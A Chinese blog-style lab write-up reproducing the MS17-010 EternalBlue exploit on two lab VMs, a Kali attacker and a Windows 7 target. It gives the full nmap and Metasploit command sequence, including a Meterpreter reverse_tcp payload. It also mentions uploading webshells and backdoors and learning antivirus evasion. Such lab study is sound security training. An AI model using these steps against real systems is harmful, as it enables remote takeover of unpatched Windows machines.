“永恒之蓝”漏洞简单复现

一、永恒之蓝概述

         MS17-010是指微软在2017年发布的一个安全公告，其中公开了一个严重的漏洞，被称为永恒之蓝（EternalBlue）漏洞。这个漏洞影响了微软Windows操作系统中的SMB协议（Server Message Block，服务器消息块），它是一种用于文件和打印机共享的通信协议。该漏洞会扫描开放的445端口（文件共享端口），无需用户的交互，只要用户开机上网，攻击者就能进行攻击。攻击者可以利用永恒之蓝漏洞通过网络向受感染的计算机发送恶意代码，从而实施各种攻击，包括勒索软件、间谍软件以及其他类型的恶意软件。最著名的例子之一是2017年的WannaCry勒索软件攻击，该攻击利用了永恒之蓝漏洞，导致了全球范围内数十万台计算机受到感染和勒索。

二、SMB协议

       SMB（Server Message Block）协议是一种用于在计算机网络上共享文件、打印机和其他资源的通信协议。它最初由IBM开发，现在被广泛应用于Windows操作系统中。SMB协议允许客户端计算机（如个人电脑）与服务器或其他客户端计算机进行通信，以便访问共享文件夹、打印机以及其他网络资源。

三、漏洞复现前的准备 

        我使用的是两台虚拟机，分别是kali（攻击机）和Windows7（靶机），nmap，和虚拟机里面的metasploit(MSF)，kali(192.168.197.128)、Windows7(192.168.197.129)

四、漏洞复现过程

复现的前提是两台虚拟机的网络能ping通，两台虚拟机的网络适配器设置都是NAT模式

两台虚拟机互相ping一下，看看网络能不能到达

确保两台虚拟机能ping通后再进行后面的相关步骤

进入kali这里先进入到管理员模式sudo，sudo su命令提升用户为管理员权限

用nmap对靶机进行扫描，查看端口开放情况，确保靶机的445 端口是开放的

nmap -T4 -A -v 加靶机地址，可以看到445端口是开放的

 进入kali的MSF，命令(msfconsole),进去的页面是随机的

输入search ms17_010查看该漏洞的漏洞模块，exploit是攻击模块，auxiliarys是扫描模块，用于检验该漏洞是否存在

 输入命令 use 3或者use auxiliary/scanner/smb/smb_ms17_010,进入探证模块

 设置靶机的ip:set rhosts 192.168.197.129

查看相关参数：show options，可以看到靶机的相关设置已经完成

进入攻击模块

use 0：use进入攻击模块

set payload windows/x64/meterpreter/reverse_tcp：设置攻击载荷

set lhosts 192.168.197.128：设置攻击机的ip

show options：查看配置参数

run或者exploit执行攻击操作，下图为漏洞利用成功

现在已经可以远程操控靶机了，输入sysinfo显示靶机系统信息

我们来进行简单的图片上传操作

输入shell进入靶机的命令行 ，查看图片是否上传成功

 可以看到1.jpeg 上传成功，当然还可以上传文件，webshell,木马后门程序等

后续可以进行更多的渗透操作，这里就不一一列举了。忘了一点，靶机的防火墙，免杀程序需要关闭，不然nmap扫描不到主机和相应的端口，当然也可以学习一些关于msf的免杀等绕过相关防护软件。